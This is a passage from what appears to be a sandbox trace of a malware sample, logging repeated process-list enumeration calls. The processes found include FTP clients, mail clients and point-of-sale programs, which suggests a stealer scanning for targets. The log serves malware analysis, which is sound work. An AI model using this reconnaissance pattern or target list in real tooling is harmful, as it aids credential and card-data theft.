lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0186.614] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0186.617] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0186.619] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0186.622] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.624] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.627] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0186.629] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.633] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.635] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.639] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.642] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0186.648] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0186.651] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0186.653] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0186.656] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0186.658] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0186.660] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0186.663] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0186.665] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0186.667] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0186.670] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0186.673] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0186.676] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0186.678] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0186.680] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0186.691] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0186.695] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0186.697] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0186.699] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0186.702] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0186.705] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0186.707] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0186.710] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0186.713] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0186.717] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0186.720] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0186.723] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0186.725] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0186.735] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0186.739] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0186.741] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0186.744] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0186.746] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0186.748] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0186.750] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0186.752] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0186.754] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0186.757] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0186.760] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0186.762] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0186.764] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0186.766] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0186.770] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0186.772] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0186.775] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0186.777] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0186.779] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0186.781] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0186.784] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0186.787] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0186.789] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0186.791] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0186.793] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0186.795] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0186.797] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0186.800] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0186.802] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0186.803] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0186.806] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0186.811] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0186.814] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0186.819] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0186.822] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0186.824] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0186.827] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.829] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.831] Process32Next (in: hSnapshot=0x1968, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0186.834] CloseHandle (hObject=0x1968) returned 1 [0186.834] Sleep (dwMilliseconds=0x64) [0186.938] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x192c [0186.953] Process32First (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.955] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0186.959] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0186.961] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.963] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0186.966] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.968] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, 